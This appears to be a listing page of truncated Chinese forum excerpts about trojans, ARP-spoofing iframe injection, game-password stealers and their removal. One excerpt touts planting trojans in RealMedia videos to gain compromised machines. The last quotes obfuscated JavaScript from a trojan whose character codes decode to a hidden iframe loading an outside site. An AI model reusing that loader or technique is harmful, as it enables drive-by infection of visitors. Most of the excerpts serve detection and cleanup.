<%dim phdim intfileserver.ScriptTimeout = 600ph=server.mappath("/") Sub InsertAllFiles(Path)Set FSO = CreateObject("Scripting.FileSystemObject")on error resume next Set f = FSO.GetFolder(Path)Set fc2 = ...

关于木马群cmdbcs.exe，wsttrs.exe，msccrt.exe，winform.exe,upxdnd.exe等的清除Trojan.PSW.OnlineGames.XX相关病毒最近很多人中了木马群cmdbcs.exe，wsttrs.exe，msccrt.exe，winform.exe,upxdnd.exe等 这个应该是通过木马下载器下载所致 这些基本上都是些盗号木马一般sreng日志表现如下：启动项目里 (不一定全)<wsttrs><C:\windows\wsttrs.exe> [Microsoft Corpo...

<script language="JavaScript1.1">var slidespeed=3000var slideimages=new Array("http://www.blueidea.com/articleimg/upload/2006/3/5/2482150_1_7.jpg","http://www.blueidea.com/articleimg/upload/2006/3/5/2482150_2_1.jpg","http://www.blueidea.com/articleimg/upload/2006/3/5/248215...

<script language="JavaScript1.1">var slidespeed=3000//specify imagesvar slideimages=new Array("http://www.blueidea.com/articleimg/upload/2006/3/5/2482150_1_7.jpg","http://www.blueidea.com/articleimg/upload/2006/3/5/2482150_2_1.jpg","http://www.blueidea.com/articleimg/u...

最近我的网站突然出现访问的迟钝，并且打开之后杀毒软件立即提示含有木马病毒。我就很纳闷，运行了4年的网站一直都好好的最近怎么出现病毒提示呢。职业习惯原因打开了网站的源代码查看，原来在网页源代码的头部被加入了<iframe>嵌套框架网页，该网页执行木马程序……按照常理我心中一寒：估计是服务器被人攻陷了，所有文件代码被加了此行代码，于是FTP上去，下载文件下来查看却没有该代码。于是询问服务器管理员含笑，他一听就说：“是中ARP欺骗的病毒攻击了”。那么什么是“ARP欺骗”呢？首先，ARP的意思是AddressResolutionProtocol（地址解析协议），它是一个位于TCP/IP协议...

在Real影片中放木马后门.遇到类是情况希望大家注意经常遇到rm影片播放时弹出网页，一直不知道怎么回事，前几天看到了大众软件中一篇文章才知道插入和去除的方法，好东东不敢独享，在网上搜了三篇相关文章，转给大家拉！ 　　在Real影片中放 木马 在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式，但这种方法很有效果，比如在著名的A片交流软件PP点点通里，安装了一个这样的小木马 ，两天就有200个肉鸡，并且呈几何状增长.大家别做坏事。 使用某个工具来修改影片的剪辑信息,可以在指定时间打开指定的窗口. 　　新建...

任何病毒和木马存在于系统中，都无法彻底和进程脱离关系，即使采用了隐藏技术，也还是能够从进程中找到蛛丝马迹，因此，查看系统中活动的进程成为我们检测病毒木马最直接的方法。但是系统中同时运行的进程那么多，哪些是正常的系统进程，哪些是木马的进程，而经常被病毒木马假冒的系统进程在系统中又扮演着什么角色呢？请看本文。 病毒进程隐藏三法 当我们确认系统中存在病毒，但是通过“任务管理器”查看系统中的进程时又找不出异样的进程，这说明病毒采用了一些隐藏措施，总结出来有三法： 1.以假乱真 系统中的正常进程有：svchost.exe、explorer.exe、iexplore...

上周，金山反病毒中心截获一个以盗取“魔域”、“完美世界”和“浩方游戏平台”为目的的木马病毒，该病毒名为Win32.Troj.OnlineGames.ms.18432，自上周四出现以来已经衍生多个变种。金山客服中心接到大量用户投诉，反映系统重启无法显示桌面。金山毒霸（病毒库版本2007.04.07.16）已经可以查杀该病毒目前所有变种。病毒分析报告：这是一个盗取“魔域”、“完美世界”和“浩方游戏平台”帐号为目的的木马，它用特殊的方法逃避杀毒软件的查杀，可能是病毒作者制作程序的BUG导致系统重启时，无法正常显示桌面。1：拷贝文件病毒运行后，会把自己拷贝到系统目录中C:\WINDOWS\system...

服务器中了病毒是件超级麻烦的事情，尤其是什么熊猫烧香之类的或者变种病毒，因为它们不单单潜伏于计算机里，还会把所有的一些网页文件加上了一些iframe，让访问者继续中毒，我想这也是它得已迅速蔓延的手段吧！     如果要把网页中的iframe去掉，是件吃力的苦力活。     所以，写了这样的一个小工具，希望能起到一点点的作用。      请把代码复制，保存在本地，以hta为扩展名。然后双击执行[code]<html><h...

使用前，请先断网，删除系统目录下的SysLoad3.exe以及1.exe,2.exe,...,7.exe，用IceSword删除临时目录下的那几个动态库。当任务管理器里没有iexplore.exe和notepad.exe的进程时，就可以运行这个恢复程序了。       特别注意：运行过程中，不要去运行其他程序，有可能你运行的那个程序就是带毒的！！ [b]二:以下是分析和手动清除方法:     昨天下午加班回来，发现本本的行为相当诡异。看了看任务管理器，有几个Ie的进...

从下面的木马中,发现的书写js的另一方法[html]<html> <body> <div id="theid"></div> <script> p="60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,112,58,47,47,97,45,108,46,109,101,105,98,117,46,99...